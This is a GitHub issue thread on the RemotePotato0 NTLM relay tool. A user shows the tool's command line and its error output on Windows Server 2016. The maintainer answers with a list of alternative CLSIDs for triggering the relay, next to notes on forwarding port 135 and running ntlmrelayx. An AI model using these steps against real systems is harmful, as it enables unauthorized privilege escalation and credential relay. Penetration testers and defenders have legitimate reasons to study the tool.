### ISSUE TITLE
CLSID not found

### ISSUE THREAD

**Issue by metac0rtex** [antonioCoco/RemotePotato0#3]
I am attempting to use this and I got the following output on the user machine.

```
C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
[*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
[*] RPC relay server listening on port 9997 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
[*] IStoragetrigger written: 104 bytes
[!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.
```

The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?

**Comment by antonioCoco** [comment]
i have tested the default clsid we hardcoded {5167B42F-C111-47A1-ACC4-8EABE61B0B54} and i can confirm it works on a windows server 2019 and server 2016 default installation.

If you want a complete list of the CLSID usable on a windows server 2016 you can find it here --> http://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard/

following an extracted useful list:

{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

feel free to pick one of it if any problems occur.
